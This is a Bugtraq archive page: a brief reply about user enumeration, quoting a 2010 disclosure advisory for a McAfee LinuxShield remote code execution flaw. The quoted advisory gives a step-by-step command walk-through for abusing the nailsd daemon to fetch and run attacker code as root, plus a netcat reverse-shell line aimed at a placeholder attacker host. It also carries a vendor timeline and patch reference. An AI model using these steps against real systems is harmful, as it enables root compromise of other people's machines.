[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: NSOADV-2010-004: McAfee LinuxShield remote/local code execution

To: "Veal, Richard" <rveal@xxxxxxxxxxxxxxxxxx>, bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
From: NSO Research <nso-research@xxxxxxxxxx>
Date: Wed, 03 Mar 2010 10:59:57 +0100
ACK! You can find user which can login to the web interface with this trick.


Am 03.03.2010 09:14, schrieb Veal, Richard:
> 
> I believe there could also be a remote user enumeration using this
> service - when attempting to log into the web interface using a
> non-valid username / any password you get "Error: bad credentials" but
> when attempting to log with a valid username / invalid password you seem
> to get: 
> 
> "Error: bad credentials
> Error Information
> Error Code    Description
> 34    authentication failure"
> 
> Version 1.5.1, anyone confirm? Has this been mentioned before?
> 
> 
> Rich
> 
> 
> 
> -----Original Message-----
> From: NSO Research [mailto:nso-research@xxxxxxxxxx] 
> Sent: 02 March 2010 21:30
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> 
> ______________________________________________________________________
> 
> NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> ______________________________________________________________________
> ______________________________________________________________________
> 
>                                111101111
>                         11111 00110 00110001111
>                    111111 01 01 1 11111011111111
>                 11111  0 11 01 0 11 1 1  111011001
>              11111111101 1 11 0110111  1    1111101111
>            1001  0 1 10 11 0 10 11 1111111  1 111 111001
>          111111111 0 10 1111 0 11 11 111111111 1 1101 10
>         00111 0 0 11 00 0 1110 1 1011111111111 1111111 11  100
>        10111111 0 01 0  1 1 111110 11 1111111111111  11110000011
>        0111111110 0110 1110 1 0 11101111111111111011 11100  00
>        01111 0 10 1110 1 011111 1 111111111111111111111101 01
>        01110 0 10 111110 110 0 11101111111111111111101111101
>       111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
>       111110110 10 0111110 1 0 0 1111111111111111111111111 110
>     111 11111 1  1 111 1   10011 101111111111011111111 0   1100
>    111 10  110 101011110010   11111111111111111111111 11 0011100
>    11 10     001100     0001      111111111111111111 10 11 11110
>   11110       00100      00001     10 1  1111  101010001 11111111
>   11101        0  1011     10000    00100 11100        00001101 0
>   0110         111011011             0110   10001        101 11110
>   1011                 1             10 101   000001        01   00
>    1010 1                              11001      1 1        101  10
>       110101011                          0 101                 11110
>             110000011
>                       111
> ______________________________________________________________________
> ______________________________________________________________________
> 
>   Title:                  McAfee LinuxShield remote/local code
>                           execution
>   Severity:               Medium
>   Advisory ID:            NSOADV-2010-004
>   Found Date:             07.12.2009
>   Date Reported:          05.02.2010
>   Release Date:           02.03.2010
>   Author:                 Nikolas Sotiriu (lofi)
>   Website:                http://sotiriu.de
>   Twitter:                http://twitter.com/nsoresearch
>   Mail:                   nso-research at sotiriu.de
>   URL:                    http://sotiriu.de/adv/NSOADV-2010-004.txt
>   Vendor:                 McAfee (http://www.mcafee.com/)
>   Affected Products:      McAfee LinuxShield <= 1.5.1
>   Not Affected Products:  McAfee LinuxShield 1.5.1 with HF550192
>   Remote Exploitable:     Yes (attacker must be authenticated)
>   Local Exploitable:      Yes
>   Patch Status:           Vendor released a patch (See Solution)
>   Discovered by:          Nikolas Sotiriu
>   Thanks to:              Thierry Zoller: For the permission to use his
>                                           Policy
> 
> 
> Background:
> ===========
> 
> LinuxShield detects and removes viruses and other potentially unwanted
> software on Linux-based systems. LinuxShield uses the powerful McAfee
> scanning engine - the engine common to all our anti-virus products.
> 
> Although a few years ago, the Linux operating system was considered a
> secure environment, it is now seeing more occurrences of software
> specifically written to attack or exploit security weaknesses in
> Linux-based systems. Increasingly, Linux-based systems interact with
> Windows-based computers. Although viruses written to attack Windows-
> based systems do not directly attack Linux systems, a Linux server can
> harbor these viruses, ready to infect any client that connects to it.
> 
> When installed on your Linux systems, LinuxShield provides protection
> against viruses, Trojan horses, and other types of potentially unwanted
> software.
> 
> LinuxShield scans files as they are opened and closed - a technique
> known as on-access scanning. LinuxShield also incorporates an on-demand
> scanner that enables you to scan any directory or file in your host at
> any time.
> 
> When kept up-to-date with the latest virus-definition (DAT) files,
> LinuxShield is an important part of your network security. We recommend
> that you set up an anti-virus security policy for your network,
> incorporating as many protective measures as possible.
> 
> LinuxShield uses a web-browser interface, and a large number of
> LinuxShield installations can be centrally controlled by ePolicy
> Orchestrator.
> 
> (Product description from LinuxShield Product Guide)
> 
> 
> 
> Description:
> ============
> 
> This vulnerability allows remote attackers to execute arbitrary code on
> vulnerable installations of McAfee LinuxShield. User interaction is not
> required to exploit this vulnerability but an attacker must be
> authenticated.
> 
> The LinuxShield Webinterface communicates with the localy installed
> "nailsd" daemon, which listens on port 65443/tcp, to do configuration
> changes, query the configuration and execute tasks.
> 
> Each user, which can login to the victim box, can also authenticate it
> self to the "nailsd" and can do configuration changes and execute tasks
> with root privileges.
> 
> A direct execution of commands is not possible, but it is possible to
> download and execute code through manipulation of the config and execute
> schedule tasks of the LinuxShield.
> 
> 
> walk-through (after the TLS handshake):
> +--------------------------------------
> 
> nailsd  > +OK welcome to the NAILS Statistics Service
> attacker> auth <user> <pass>
> nailsd  > +OK successful authentication
> 
> # Set the Attacker repository to download our code from a httpd #
> (catalog.z)
> #---------------------------------------------------------------
> attacker> db set 1 _table=repository status=1 siteList=<?xml\ version
>           ="1.0"\ encoding="UTF-8"?><ns:SiteLists\ xmlns:ns="naSiteLi
>           st"\ GlobalVersion="20030131003110"\ LocalVersion="20091209
>           161903"\ Type="Client"><SiteList\ Default="1"\ Name="SomeGU
>           ID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1
>           "\ Server="<attackerhost>:80"\ Enabled="1"\ Local="1"><Rela
>           tivePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></
>           UserName><Password\ Encrypted="0"/></HttpSite></SiteList></
>           ns:SiteLists> _cmd=update
> nailsd  > +OK database changes buffered.
> 
> # Execute task to set the attacker repository
> #---------------------------------------------------------------
> attacker> task setsitelist
> nailsd  > +OK setting sitelist from CMA.
> 
> # Execute the default Update task to download the code
> #---------------------------------------------------------------
> attacker> task nstart LinuxShield Update
> nailsd  > +OK task LinuxShield Update starting
> 
> # Create a Scan profile, which executes our code. The profiles are # not
> stored in the database.
> # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
> #---------------------------------------------------------------
> attacker> sconf ODS_99 begin
> nailsd  > +OK 1260400888
> 
> # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path #
> where our earlier downloaded catalog.z file is stored.
> # (/opt/McAfee/cma/scratch/update/catalog.z)
> #---------------------------------------------------------------
> attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
>           true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
>           DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
>           10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
>           ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
>           file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
>           ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
>           ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
>           .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
>           risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
>           e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
>           .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
>           le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
>           dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
>           e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
>           ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
>           o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
>           .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
>           rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
>           ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
>           00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
>           ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
>           ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
>            nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
>           ofile.ODS_99.filter.extensions.type=extension nailsd.profil
>           e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
>           .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
>           action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
>           econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
>           ss nailsd.profile.ODS_99.action.error=Block
> nailsd  > +OK configuration changes buffered
> attacker> sconf ODS_99 commit 1260400888
> nailsd  > +OK configuration changes stored
> 
> # Set a scan task with the manipulated profile to execute the code
> #---------------------------------------------------------------
> attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
>           pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
>           mp;exclude:false timetable=type=unscheduled taskResults=0 i
>           _lastRun=1260318482 status=Stopped _cmd=insert nailsd  > +OK
> database changes buffered
> 
> # Execute scan task to execute the code
> #---------------------------------------------------------------
> attacker> task nstart Evil Task
> 
> +-------------------------------------- walk-through EOF
> 
> 
> To get a reverse root shell place something like this in the catalog.z
> 
> --- snip ---
> #!/bin/sh
> nc -nv <attacker_host> 4444 -e /bin/sh
> --- /snip ---
> 
> 
> 
> Proof of Concept :
> ==================
> 
> http://sotiriu.de/software/NSOPOC-2010-004.tar.gz
> 
> 
> 
> Solution:
> =========
> 
> McAfee Advisory
> +--------------
> https://kc.mcafee.com/corporate/index?page=content&id=SB10007
> 
> 
> 
> Disclosure Timeline (YYYY/MM/DD):
> =================================
> 
> 2009.12.07: Vulnerability found
> 2010.02.03: Asked vendor for a PGP key
> 2010.02.05: Vendor sent his PGP key
> 2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
>             date (2010.02.18) to Vendor
> 2010.02.05: Vendor acknowledges the reception of the advisory
> 2010.02.16: Ask for a status update, because the planned release date is
>             2010.02.18.
> 2010.02.16: Vendor response that, they are currently working on a patch
> 2010.02.17: Changed release date to 2010.02.25.
> 2010.02.22: Vendor gives a status update, that they are able to release
>             the patch on 2010.02.25.
> 2010.02.24: Ask for a list of affected products and the advisory url.
> 2010.02.24: Vendor sends the list.
> 2010.03.02: Release of this Advisory
> 
> 
> 
> 
> 
> 
> 
> ______________________________________________________________________
> This email has been scanned by the MessageLabs Email Security System.
> For more information please visit http://www.messagelabs.com/email
> ______________________________________________________________________
> 
> Western Power Distribution (South West) plc / Western Power Distribution 
> (South Wales) plc 
> Registered in England and Wales 
> Registered number: 2366894 (South West) / 2366985 (South Wales) 
> Registered Office: Avonbank, Feeder Road, Bristol, BS2 0TB 
> 
> This email and any files transmitted with it are confidential and intended 
> solely for the use of the individual or entity to whom they are addressed. If 
> you have received this email in error please notify 
> postmaster@xxxxxxxxxxxxxxxxxx
References:
- NSOADV-2010-004: McAfee LinuxShield remote/local code execution
  - From: NSO Research
- RE: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
  - From: Veal, Richard
Prev by Date: RE: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
Next by Date: Re: Todd Miller Sudo local root exploit discovered by Slouching
Previous by thread: RE: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
Next by thread: Cisco Security Advisory: Cisco Unified Communications Manager Denial of Service Vulnerabilities
Index(es):
- Date
- Thread